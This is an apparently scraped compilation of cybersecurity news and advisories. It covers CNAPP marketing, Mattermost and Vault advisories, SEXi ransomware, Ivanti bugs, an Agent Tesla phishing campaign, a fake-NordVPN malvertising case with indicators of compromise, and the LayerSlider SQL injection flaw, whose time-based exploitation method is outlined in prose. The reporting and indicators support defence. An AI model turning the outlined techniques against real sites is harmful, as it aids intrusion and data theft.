Cloud-native application protection platforms (CNAPPs) sidestep siloed security and embed security into the earliest stages of application development.

Source: John Williams RF via Alamy

Multicloud security is an enormously complex undertaking, requiring security teams to correlate thousands of daily security alerts across disparate platforms to efficiently and accurately respond to emergent threats. Rather than relying on a series of third-party point solutions — which often struggle to integrate and communicate with one another — to protect your multicloud environment, we recommend prioritizing native security solutions that can embed seamlessly within your environment.

A cloud-native application protection platform (CNAPP) is a unified platform that simplifies securing cloud applications throughout their life cycles. Originally coined by Gartner, this all-in-one platform connects traditionally siloed security and compliance capabilities into a single user interface. At their core, CNAPPs allow security teams to embed security into the earliest stages of the application development process and deploy more robust protections for cloud workloads and data.

There are many use cases where a cloud-native solution will have a natural edge over third-party solutions. We have picked a few common scenarios to showcase capabilities that are hard to replicate with a customized or third-party solution. This list is meant to be representative, not exhaustive.

**1\. Monitoring Your Cloud Management Layer**

The cloud management layer is a crucial service connected to all of your cloud resources. That also makes it a potential target for attackers. Consequently, we recommend security operations teams monitor the resource management layer closely.

Since cloud service providers (CSPs) do not allow integration with this layer, the capabilities provided by third-party solutions are severely limited and rely solely on the availability of logs/events, like Azure Diagnostics and AWS CloudTrail.

**2\. Detecting Near Real-Time Threats With Zero or Minimal Impact on Workloads**

As you leverage more native architecture patterns, your usage of native storage, like object storage and native SQL, will grow. As a result, these services often represent an attack target.

Because CSPs do not allow native integration with these services, organizations often struggle to detect malware as soon as an object is uploaded to a storage account without introducing latency or further risks to their workloads. We also see this same issue present when trying to detect sensitive data across databases and object stores without allowing access to a third-party solution. Native cloud security offerings do not have these limitations.

**3\. Inherent Coverage of Workloads as You Scale or Modernize**

Native solutions are deployed at the account or subscription level, integrate natively with other cloud services, and cover a vast variety of usage patterns. Often, these solutions do not require any agent and are push-button. When cloud architecture teams decide to migrate from a virtual machine-based deployment to one that's container-based, organizations can rest assured that the workload is protected from the start.

**4\. Integrating with Your Native Pipelines**

When organizations deploy cloud workloads, they can integrate the native solution at the code repository level. This ensures they are checking appropriate risks at each level — for example, code scanning as part of code merges or image scanning on push. Native solutions also allow organizations to manifest validation before container deployment.

**5\. Maintaining Your Access-Related Blast Radius**

When organizations deploy a third-party solution, that solution requires its own set of roles that need to be monitored. Users will also most likely need to be managed within the third-party solution itself. This adds additional monitoring requirements for security teams that are not needed when deploying native solutions. Because native solutions already integrate with other cloud services and leverage predefined roles, security teams don't need to worry about any additional risks being introduced into their environments.

As we have seen, CNAPPs have a unique value proposition for integrating in your cloud security portfolio, either as the primary solution or as a complement to your existing cloud security posture management (CSPM).

— Read more Partner Perspectives from Microsoft Security

**About the Author(s)**

Microsoft

Protect it all with Microsoft Security.

Microsoft offers simplified, comprehensive protection and expertise that eliminates security gaps so you can innovate and grow in a changing world. Our integrated security, compliance, and identity solutions work across platforms and cloud environments, providing protection without compromising productivity.

We help customers simplify the complex by prioritizing risks with unified management tools and strategic guidance created to maximize the human expertise inside your company. Our unparalleled AI is informed by trillions of signals so you can detect threats quickly, respond effectively, and fortify your security posture to stay ahead of ever-evolving threats.

Reconsider Your CNAPP Strategy Using These 5 Scenarios

Mattermost versions 8.1.x before 8.1.11, 9.3.x before 9.3.3, 9.4.x before 9.4.4, and 9.5.x before 9.5.2 fail to authenticate the source of certain types of post actions, allowing an authenticated attacker to create posts as other users via a crafted post action.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-2447

**Mattermost fails to authenticate the source of certain types of post actions**

Moderate severity GitHub Reviewed Published Apr 5, 2024 to the GitHub Advisory Database • Updated Apr 5, 2024

**Package**

gomod github.com/mattermost/mattermost/server/v8 (Go)

**Affected versions**

\>= 8.1.0, < 8.1.11

\>= 9.5.0, < 9.5.2

\>= 9.4.0, < 9.4.4

\>= 9.3.0, < 9.3.3

**Patched versions**

8.1.11

9.5.2

9.4.4

9.3.3

**Description**

Published to the GitHub Advisory Database

Apr 5, 2024

GHSA-wp43-vprh-c3w5: Mattermost fails to authenticate the source of certain types of post actions

A Babuk variant has been involved in at least four attacks on VMware EXSi servers in the last six weeks, in one case demanding $140 million from a Chilean data center company.

Source: Don McBailey/Stockimo via Alamy Stock Photo

What appears to be a fresh variant of the Babuk ransomware has emerged to attack VMware ESXi servers in several countries, including a confirmed hit on IxMetro PowerHost, a Chilean data center hosting company. The variant calls itself "SEXi," a play on its target platform of choice.

According to CronUp cybersecurity researcher Germán Fernández, PowerHost CEO Ricardo Rubem issued a statement confirming that a new ransomware variant had locked up the company's servers using the .SEXi file extension, with the initial access vector to the internal network as yet unknown. The attackers requested $140 million in ransom, which Rubem indicated would not be paid.

SEXi's emergence stands at the crossroads of two major ransomware trends: the rash of threat actors who have developed malware based on the Babuk source code; and a lust for compromising tantalizingly juicy VMware EXSi servers.

**IX PowerHost Attack Part of Wider Ransomware Campaign**

Meanwhile, Will Thomas, CTI researcher at Equinix, uncovered what he believes to be a binary related to that used in the attack, dubbed "LIMPOPOx32.bin" and tagged as a Linux version of Babuk in VirusTotal. At press time, that malware has a 53% detection rate on VT, with 34 out of 64 security vendors flagging it as malicious since it was first uploaded on Feb. 8. MalwareHunterTeam spotted it back on Valentine's Day, when it was being used without the "SEXi" handle in an attack on an entity in Thailand.

But Thomas further discovered other, related binaries. As he tweeted, "SEXi ransomware attack on IXMETRO POWERHOST linked to broader campaign that has hit at least three Latin American countries." These call themselves Socotra (used in an attack in Chile on March 23); Limpopo again (used in an attack in Peru on Feb. 9); and Formosa (used in an attack in Mexico on Feb. 26). Concerningly, at press time all three registered zero detections in VT.

Together, the findings showcase the development of a novel campaign using various SEXi iterations that all lead back to Babuk.

**Shadowy TTPs Emerge in SEXi Attacks**

There's no indication of where the malware operators originate from or what their intentions are. But slowly a set of tactics, techniques, and procedures are emerging. For one, the binaries' nomenclature comes from place names. Limpopo is the northernmost province of South Africa; Socotra is a Yemeni island in the Indian Ocean; and Formosa was a short-lived republic located on Taiwan in the late 1800s, after China's Qing Dynasty ceded its rule over the island.

And, as MalwareHunterTeam pointed out on X, "maybe interesting / worth to mention about this 'SEXi' ransomware that the communication method specified by the actors in the note is Session. While we\['ve\] seen some actors using it even years ago already, I \[don't\] remember seeing it in relation to any big/serious cases/actors."

Session is a cross-platform, end-to-end encrypted instant messaging application emphasizing user confidentiality and anonymity. The ransom note in the IX PowerHost attack urged the company to download the app and then send a message with the code "SEXi"; the earlier note in the Thai attack urged the Session download but to include the code "Limpopo."

**EXSi Is Sexy to Cyberattackers**

VMware's EXSi hypervisor platform runs on Linux and Linux-like OS, and can host multiple, data-rich virtual machines (VMs). It has been a popular target for ransomware actors for years now, partly because of the size of the attack surface: There are tens of thousands of ESXi servers exposed to the Internet, according to a Shodan search, with most of them running older versions. And that doesn't take into account those that are reachable after an initial access breach of a corporate network.

Also contributing to ransomware gangs' growing interest in EXSi, the platform doesn't support any third-party security tooling.

"Unmanaged devices such as ESXi servers are a great target for ransomware threat actors," according to a report from Forescout released last year. "That's because of the valuable data on these servers, a growing number of exploited vulnerabilities affecting them, their frequent Internet exposure and the difficulty of implementing security measures, such as endpoint detection and response (EDR), on these devices. ESXi is a high-yielding target for attackers since it hosts several VMs, allowing attackers to deploy malware once and encrypt numerous servers with a single command."

VMware has a guide for securing EXSi environments. Specific suggestions include: Make sure ESXi software is patched and up-to-date; harden passwords; remove servers from the Internet; monitor for abnormal activities on network traffic and on ESXi servers; and ensure there are backups of the VMs outside the ESXi environment to enable recovery.

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

SEXi Ransomware Desires VMware Hypervisors in Ongoing Campaign

So far this year, Ivanti has disclosed a total of 10 flaws — many of them critical — in its remote access products, and one in its ITSM product.

Source: garagestock via Shutterstock

Ivanti CEO Jeff Abbott this week said his company will completely revamp its security practices even as the vendor disclosed another fresh set of bugs in its vulnerability-riddled Ivanti Connect Secure and Policy Secure remote access products.

In an open letter to customers, Abbott committed to a series of changes the company will make in the coming months to transform its security operating model following a relentless barrage of bug disclosures since January. The promised fixes include a complete do-over of Ivanti's engineering, security, and vulnerability management processes and implementation of a new secure-by-design initiative for product development.

**A Thorough Overhaul**

"We have challenged ourselves to look critically at every phase of our processes, and every product, to ensure the highest level of protection for our customers," Abbott said, in his statement. "We have already begun applying learning from recent incidents to make immediate improvements to our own engineering and security practices."

Some of the specific steps include embedding security into every stage of the software development life cycle and integrating new isolation and anti-exploit features in its products to minimize the potential impact of software vulnerabilities. The company will also improve its internal vulnerability discovery and management process and increase incentives for third-party bug hunters, Abbott said.

In addition, Ivanti will make more resources available to customers for finding vulnerability information and associated documentation and is committed to greater transformation and information sharing with customers, he added.

How much these commitments will help stem growing customer disenchantment with Ivanti remains unclear given the company's recent security track record. In fact, Abbot's comments came one day after Ivanti disclosed four new bugs in its Connect Secure and Policy Secure gateway technologies and issued patches for each of them.

The disclosure followed a similar incident less than two weeks ago that involved two bugs in Ivanti's Standalone Sentry and Neuron's for ITSM products. Ivanti so far has disclosed a total of 11 vulnerabilities — including the four this week — in its technologies since Jan. 1. Many of them have been critical flaws — at least two were zero-days — in the company's remote access products, which attackers, including advanced persistent threat actors such as "Magnet Goblin," have exploited in mass fashion. Concern over the potential for major breaches from some of these bugs prompted the US Cybersecurity and Infrastructure Security Agency (CISA) in January to order all civilian federal agencies to take their Ivanti systems offline and not reconnect the devices until fully remediated.

Security researcher and IANS Research faculty member Jake Williams says the vulnerability disclosures have prompted serious questions from Ivanti's customers. "Based on conversations I'm having, especially with Fortune 500 clients, I honestly think it's a bit of too little, too late," he says. "The time to publicly make this commitment was more than a month ago." There is no question that the issues with the Ivanti VPN appliance (formerly Pulse) are making CISOs question the security of Ivanti's many other products, he says.

**A Fresh Set of 4 Bugs**

The four new bugs Ivanti disclosed this week included two heap overflow vulnerabilities in the IPSec component of Connect Secure and Policy Secure, both of which the company characterized as high-severity risk for customers. One of the vulnerabilities, tracked as CVE-2024-21894, gives unauthenticated attackers a way to run arbitrary code on affected systems. The other, assigned as CVE-2024-22053, allows an unauthenticated remote attacker to read the contents from system memory under certain conditions. Ivanti described both vulnerabilities as allowing attackers to send maliciously crafted requests to trigger denial of service conditions.

The other two flaws — CVE-2024-22052 and CVE-2024-22023 — are two medium-severity vulnerabilities that attackers can exploit to cause denial-of-service conditions on affected systems. Ivanti said that as of April 2, it was not aware of any exploit activity in the wild targeting the vulnerabilities.

The steady stream of bug disclosures has raised questions about the risk that Ivanti's products pose to more than 40,000 customers worldwide, with some expressing their frustration on forums such as Reddit. Just two years ago, Ivanti's press releases claimed 96 of the Fortune 100 companies as its customers. In the latest release that number has declined nearly 12% to 85 companies. While the attrition might have to do with factors other than just security, some Ivanti rivals have begun to sense an opportunity. Cisco, for instance, has begun offering incentives — including a 90-day free trial — to try and get Ivanti VPN customers to migrate to its Secure Access platform so they can "mitigate risk" from Ivanti's products.

**Acquisition Related Problems?**

Eric Parizo, an analyst with Omdia, says at least some of Ivanti's challenges have to do with the fact that the company's product portfolio is the sum of numerous past acquisitions. "The original products were developed at different times by different companies for different purposes using varying methods. This means the software quality, in particular with regard to software security, can be dramatically uneven," he says.

 Parizo says what Ivanti is doing now with its commitment towards improving security processes and procedures across the board is a step in the right direction. "I would also like to see the vendor indemnify its customers for damages directly resulting from these vulnerabilities, as that will help restore confidence in future purchases," he says. "Perhaps the one saving grace for Ivanti is that customers are so used to this sort of event, with cybersecurity vendors suffering countless similar incidents in recent years, that customers are more likely to forgive and forget."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Ivanti Pledges Security Overhaul the Day After 4 More Vulns Disclosed

Latest campaign underscores wide-ranging functionality and staying power of a decade-old piece of information-stealing malware.

Source: David Chapman via Alamy

More than 11,000 Australian companies were targeted in a recent wave of cyberattacks that rely on an aging but still dangerous malware strain dubbed Agent Tesla.

Prospective victims were bombarded by booby-trapped emails with lures about purchasing goods and order delivery inquiries that came with a malicious attachment. Victims who were tricked into opening the attachment exposed their Windows PCs to Agent Tesla infections.

Agent Tesla is a remote access Trojan (RAT) that first surfaced in 2014. The malware is widely distributed and frequently used by a variety of threat actors, including cybercriminals and spies, according to researchers at Check Point Software.

Alexander Chailytko, cybersecurity, research, and innovation manager at Check Point, says threat actors have "developed a level of trust" in Agent Tesla's capabilities.

"Its reliability, coupled with its diverse range of functionalities for data exfiltration and information theft, makes it a preferred choice among cybercriminals," Chailytko explains.

The malware offers a range of data exfiltration methods and stealing capabilities that target the most commonly used software, ranging from browsers to FTP clients. Recent updates to the malware offer tighter integration with platforms such as Telegram and Discord, which makes it easier for crooks to run hacking campaigns.

Agent Tesla was in the news last year, when cybercriminals exploited a 6-year-old Microsoft Office remote execution flaw to sling Agent Tesla.

**Anatomy of an Agent Tesla Hack**

An analysis by security researchers from Check Point published in a blog post this week offered one of the most detailed inspections of the methodology of an Agent Tesla-based phishing campaign to date. Their work offers a postmortem on a high-volume series of attacks launched in November 2023 against mostly Australian and American targets.

Check Point said a threat actor dubbed "Bignosa" first installed Plesk (for hosting) and Round Cube (email client) onto a hosted server. The attackers then disguised the Agent Tesla payload using a package called Cassandra Protector that hid the malicious code and controlled its delivery.

Cassandra Protector bundles a variety of options that allow cybercriminals to configure sleep time before execution. Among other functions, it controls the text in the fake dialogue box that appears when victims open a malicious file.

Once Agent Tesla was "protected" this way, Bignosa converted the malicious .NET code into an ISO file with a ".img" extension before attaching the resulting file to the spam emails.

Next, Bignosa connected to the newly configured machine via a remote access network protocol connection, created an email address, logged in to webmail, and launched the spam run using a pre-prepared target list. According to Check Point, "a few successful infections" hit Australia in a first wave of the attack.

**Down Under**

The threat actors behind the Agent Tesla malware campaign were primarily targeting Australian businesses, as shown by the presence of a mailing list file named "AU B2B Lead.txt" on their machines.

"This suggests a deliberate effort to compile and target email addresses linked to Australian business entities, potentially for the purpose of infiltrating corporate networks with the goal of extracting valuable information for financial exploitation," Check Point's Chailytko says.

Bignosa also worked with another more proficient cybercriminal, who immodestly goes by "Gods," in a campaign to hack into Australian and US-based businesses, the researchers found.

Gods offered advice to Bignosa on the content of malicious spam text, according to Jabber chat logs uncovered by the security researchers.

Like with other cybercriminals, the duo struggled with elements of their cybercrime campaign, according to evidence uncovered by Check Point.

In multiple instances, Bignosa wasn't able to clean his machine from the Agent Tesla test infections, so the hapless hacker had to call on remote access from Gods for assistance.

Check Point said it believes that Bignosa is Kenyan and Gods is a Nigerian with a day job as a Web developer.

**How to Block Agent Tesla Infections**

The Agent Tesla-based spear-phishing campaign highlighted by Check Point underscores the still-prevalent threat posed by the mature malware.

Businesses should maintain up-to-date operating systems and applications by promptly installing patches and utilizing other security measures. Commercial spam filtering and blocklist tools can help minimize the volume of junk traffic that appears in user inboxes, according to Check Point.

Even so, end users must exercise caution when encountering unexpected emails containing links, particularly from unfamiliar senders. According to Check Point, that's where regular employee training and education programs can bolster cybersecurity awareness.

**About the Author(s)**

John Leyden is an experienced cybersecurity writer, having previously written for the Register and Daily Swig.

Image source: Dorota Szymczyk via Alamy Stock Photo

Thousands of Australian Businesses Targeted With 'Reliable' Agent Tesla RAT

Threat actors are luring victims to a fake NordVPN website that installs a Remote Access Trojan.

Most of the malicious search ads we have seen have originated from Google, but threat actors are also abusing other search engines. Microsoft Bing is probably the second best target due to its close ties to the Windows ecosystem and Edge browser.

In this blog post, we look at a very recent malvertising campaign impersonating the popular VPN software NordVPN. A malicious advertiser is capturing traffic from Bing searches and redirecting users to a decoy site that looks almost identical to the real one.

The threat actors went ever further by trying to digitally sign a malicious installer and hosting it on Dropbox. Victims will have the impression they are getting NordVPN as it is part of the package, but will also inadvertently install a Remote Access Trojan known as SecTopRAT on their computer.

We have reported the malicious Bing ad to Microsoft, and other parts of the distribution infrastructure to their respective provider. We want to reiterate that NordVPN is a legitimate VPN provider and they are being impersonated by threat actors.

**Fraudulent Bing ad**

When searching for “nord vpn” via the Bing search engine, we identified a malicious ad that impersonates NordVPN. The ad itself looks suspicious because of the URL in the ad snippet. The domain name _nordivpn\[.\]xyz_ was created one day ago (April 3, 2024). It was probably chosen as it looks quite similar to the official name and can deceive users who aren’t looking too closely.

As we often see, the ad URL is simply used as a redirection mechanism to a fake website that is meant to look identical to the one being impersonated. This is true here as well, where we have a redirect to _besthord-vpn\[.\]com_ (note again the spelling chosen with the ‘_h_‘ looking like an ‘_n_‘) which was created today, only a few hours ago.

The website looks incredibly convincing, and victims will be tricked into downloading the app from there. Unlike the legitimate NordVPN that goes through a sign up process, here you can directly download the installer from Dropbox.

Here’s a summary of the traffic flow from the malicious ad to the download link:

**Malware payload**

The downloaded file is called _NordVPNSetup.exe_ and is digitally signed, as if it was from its official vendor; however, the signature is not valid.

The file contains both an installer for NordVPN and a malware payload. The installer for NordVPN is meant to give victims the illusion that they are actually installing a real file.

The payload is injected into _MSBuild.exe_ and will connect to the malware author’s command and control server at 45.141.87\[.\]216 on port 15647.

That network traffic is detected by Emerging Threats as Arechclient2 Backdoor, an alias for SecTopRAT.

**Conclusion**

Malvertising continues to show how easy it is to surreptitiously install malware under the guise of popular software downloads. Threat actors are able to roll out infrastructure quickly and easily to bypass many content filters.

ThreatDown customers who have DNS Filtering can proactively block online ads by enabling the rule for advertisements. This is a simple, and yet powerful way to prevent malvertising across an entire organization or in specific areas.

The malicious ad and related indictors have been reported as we work with industry partners to take down this campaign.

**Indicators of Compromise**

Malicious domains

nordivpn\[.\]xyz  
besthord-vpn\[.\]com

Fake NordVPN installer

e9131d9413f1596b47e86e88dc5b4e4cc70a0a4ec2d39aa8f5a1a5698055adfc

SecTopRAT C2

45.141.87\[.\]216

 Bing ad for NordVPN leads to SecTopRAT 

Vault and Vault Enterprise TLS certificates auth method did not correctly validate OCSP responses when one or more OCSP sources were configured. Fixed in Vault 1.16.0 and Vault Enterprise 1.16.1, 1.15.7, and 1.14.11.

**HashiCorpVault does not correctly validate OCSP responses**

Moderate severity GitHub Reviewed Published Apr 4, 2024 to the GitHub Advisory Database • Updated Apr 4, 2024

GHSA-j2rp-gmqv-frhv: HashiCorpVault does not correctly validate OCSP responses

An April 2023 study from Kent State University found that remote workers are more likely to be vigilant of security threats and take actions to ward them off than their in-office counterparts.

Thursday, April 4, 2024 14:00

As my manager knows, I’m not the biggest fan of working in a physical office. I’m a picky worker — I like my workspace to be borderline frigid, I hate dark mode on any software, and I want any and all lighting cranked all the way up.  

So, know that I’m biased going into this, but I also can’t get over the idea that companies are using cybersecurity as an excuse to create return-to-office policies in 2024.  

I started thinking about this because of the video game developer Rockstar, which owns some of the largest video game franchises on the planet like Red Dead Redemption and Grant Theft Auto. 

The company recently started asking its employees to return to its physical office five days a week in the name of productivity and security as the company pushes to finish its highly anticipated title “Grand Theft Auto VI.”  

Rockstar has long faced a number of cybersecurity concerns over the years, including a massive leak featuring early, in-progress gameplay of GTA VI in 2022 and other sensitive data. The attack was eventually attributed to the Lapsus$ group, and the perpetrator was eventually charged and sentenced. The first reveal trailer for the game was also leaked ahead of time.  

Many other companies have started to implement return-to-office policies over the past two years, citing various things ranging from worker productivity to interpersonal camaraderie, real estate costs, and more. I’m willing to hear arguments for all those things, but simply thinking that having employees all in one physical space is going to solve security problems seems far-fetched to me.  

We’ve written and talked about the various ways remote work has influenced cybersecurity since the onset of the COVID-19 pandemic. There’s no doubt that admins have had to implement new login methods, security controls and policies since more workers across the globe started working remotely. But four years into this trend, there’s no excuse to not be prepared to have remote workers anymore. 

An April 2023 study from Kent State University found that remote workers are more likely to be vigilant of security threats and take actions to ward them off than their in-office counterparts.  

The use of multi-factor authentication during the rise in remote work has skyrocketed, but often, this requirement is actually dropped if a user is physically in the office or accessing an on-site machine because of the perceived security of being in the office.  

The perceived security of a physical office can sometimes lull admins into a false sense of security, too, because machines located on-site may lack pre-boot authentication or encryption that’s commonly found on remote workers’ devices.  

I’m not saying that working in an office is inherently less secure than remote work, but I do believe that the risks are essentially the same. Regardless of where an employee is working from, they should be using app-based MFA to access all their services. Sensitive software and hardware should rely on passkeys or physical token access rather than outdated password policies that create easy-to-guess or shareable text-based passwords.  

And if security is the name of the game when asking employees to come back into the office, there’s still going to be a monetary investment that comes with that, too. 

Cisco’s recently published Global Hybrid Work study found that only 28 percent of responding employees say they would rank their employers’ office’s “Privacy and security features” as “very well.” To me, that says that even if employers want workers back in the office, they still need to upgrade their security, which is always going to mean more money and greater manpower.  

Security fundamentals should stay the same, no matter where your employees are. And suppose security is a chief concern for a company in wanting to go back to the “traditional” office lifestyle. In that case, I’m willing to bet they still have security gaps to overcome that simply can’t be solved by thinking they’ll be able to keep a closer eye on employees while they’re in the office to keep them from clicking on a phishing email. 

**The one big thing **

Remote system management/desktop access tools such as AnyDesk and TeamViewer have grown in popularity since 2020. While there are many legitimate uses for this software, adversaries are also finding ways to use them for command and control in their campaigns. Cisco Talos Incident Response (Talos IR) has recently seen a spike in actors using this type of software as a method of gaining initial access to a network or to spy on the actions of users. Talos IR noted in its Quarterly Trends report for the third quarter of 2023, “AnyDesk was observed in all ransomware and pre-ransomware engagements \[. . .\], underscoring its role in ransomware affiliates' attack chains.” 

**Why do I care? **

The use of these types of tools has increased since the start of the COVID-19 pandemic when remote work became more common. Since this software is legitimate, it can be easy for an attacker to compromise it and sit undetected on a network, bypassing traditional blocking methods. These tools introduce the ability for an adversary to potentially take full remote control of a system, are easy to download and install, and can be very difficult to detect since they are considered legitimate software. 

**So now what? **

Adopting one, or at most two, approved remote management solutions will allow the organization to thoroughly test and deploy in the most secure possible configuration. Once a solution is approved and championed for the organization, other remote management/access tools should be explicitly banned by policy. Due to the complexity of implementing all these controls, detection rules can serve as a backup in case an adversary finds a way to circumvent these mitigations. 

**Top security headlines of the week **

**The U.S. and Britain have jointly filed chargers and sanctions against a Chinese state-sponsored actor known as APT31.** The group is accused of a sweeping espionage campaign allegedly linked to China's Ministry of State Security (MSS) in the province of Hubei. The group reportedly targeted thousands of U.S. and foreign politicians, foreign policy experts and other high-profile targets. Individuals in the White House, U.S. State Department and spouses of officials were also among those targeted. The attacks aligned with geopolitical events affecting China, including economic tensions with the U.S., arguments over control of the South China Sea, and pro-democracy rallies in Hong Kong in 2019. A release from the U.S. Department of Justice stated that the campaigns involved more than 10,000 malicious emails, sent to targets in multiple continents, in what it called a “prolific global hacking operation.” The charges go on to say that APT31 hoped to compromise government institution networks and stealing trade secrets. Seven Chinese nationals are the target of the new sanctions for their alleged involvement with APT31, including the Wuhan XRZ corporation that is tied to the threat actor. (Reuters, U.S. Department of Justice) 

**A silent backdoor on Linux machines was almost a massive supply chain attack, before a lone developer found malicious code hidden in software updates.** The malicious code was hidden in two updates to xz Utils, an open-source data compression utility available on almost all installations of Linux and other Unix-like operating systems. Had it been successfully deployed, adversaries could have stashed malicious code in an SSH login certificate, upload it and execute it on the backdoored device. Whoever is behind this code likely spent years working on it, with open-source updates going back to 2021. The actor never actually took advantage of the malicious code, so it’s unclear what they planned to upload. Researchers eventually identified the vulnerability as CVE-2024-3094. The U.S. Cybersecurity and Infrastructure Security Agency warned government agencies to downgrade their xz Utils to older versions. (Ars Technica, Dark Reading) 

**There is a massive backup with the National Vulnerabilities Database and, consequently, MITRE is unable to compile a list of all new vulnerabilities.** A recent study from Flashpoint found that there was backlog of more than 100,000 vulnerabilities with no CVE number, and consequently, hadn’t been included in the NVD. Of those, 330 vulnerabilities had been exploited in the wild, yet defenders had not been made aware of them. The National Institute of Standards and Technology blamed the backup on an increase in the volume of software available to the public, leading to a larger number of vulnerabilities, as well as “a change in interagency support.” NIST has only analyzed about half of the more than 8,700 vulnerabilities that had been submitted so far in 2024. And in March alone, they only analyzed 199 out of the 3,370 vulnerabilities submitted. Several organizations have tried launching their own alternatives to the NVD, though adoption can still take a long time. NIST has also vowed to remain dedicated to the NVD and that it’s still regrouping its current efforts. (SecurityWeek, The Record by Recorded Future) 

**Can’t get enough Talos? **

*   Enterprise Imperatives: The Critical Importance of Threat Intelligence 
*   Beware the gap between security readiness and confidence levels, Cisco warns 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll |  
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 744c5a6489370567fd8290f5ece7f2bff018f10d04ccf5b37b070e8ab99b3241  
**MD5:** a5e26a50bf48f2426b15b38e5894b189  
**Typical Filename:** a5e26a50bf48f2426b15b38e5894b189.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::1201

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66  
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c  
**Typical Filename:** RemComSvc.exe  
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 62dfe27768e6293eb9218ba22a3acb528df71e4cc4625b95726cd421b716f983  
**MD5:** 0211073feb4ba88254f40a2e6611fcef  
**Typical Filename:** UIHost64.exe  
**Claimed Product:** McAfee WebAdvisor  
**Detection Name:** Trojan.GenericKD.68726899

There are plenty of ways to improve cybersecurity that don’t involve making workers return to a physical office

A researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.

Source: Primakov via Shutterstock

Attackers can exploit a critical SQL injection vulnerability found in a widely used WordPress plug-in to compromise more than 1 million sites and extract sensitive data such as password hashes from associated databases.

A security researcher called AmrAwad (aka 1337\_Wannabe) discovered the bug in the LayerSlider, a plug-in for creating animated Web content. The security flaw, tracked as CVE-2024-2879, has a rating of 9.8 out of 10 on the CVSS 3.0 vulnerability-severity scale, and is associated with the "ls\_get\_popup\_markup" action in versions 7.9.11 and 7.10.0 of LayerSlider. The vulnerability is due to "insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query," according to Wordfence.

"This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database," the company said.

Wordfence awarded the researcher a bounty of $5,500 — the company's highest bounty to date — for the discovery, according to a blog post by Wordfence. AmrAwad's March 25 submission came as part of Wordfence's second Bug Bounty Extravaganza, and the company contacted the Kreatura Team, developers of the plug-in, the same day to notify them of the flaw. The team responded the next day and delivered a patch in version 7.10.1 of LayerSlider on March 27.

**Exploiting the LayerSlider SQL Injection Flaw**

The potential for exploitation of the vulnerability lies in the insecure implementation of the LayerSlider plug-in's slider popup markup query functionality, which has an "id" parameter, according to Wordfence.

According to the firm, "if the 'id' parameter is not a number, it is passed without sanitization to the find() function in the LS\_Sliders class," which "queries the sliders in a way that constructs a statement without the prepare() function."  

Since that function would "parameterize and escape the SQL query for safe execution in WordPress, thereby providing protection against SQL injection attacks," its absence creates a vulnerable scenario, according to Wordfence.

However, to exploit the flaw requires a "a time-based blind approach" on the part of attackers to extract database information, which is "an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities," according to Wordfence.

"This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database," the company explained.

**Secure WordPress, Secure the Web**

Vulnerable WordPress sites are a popular target for attackers given the content management system's widespread use across the Internet, and often vulnerabilities exist in plug-ins that independent developers create for adding functionality to sites using the platform.

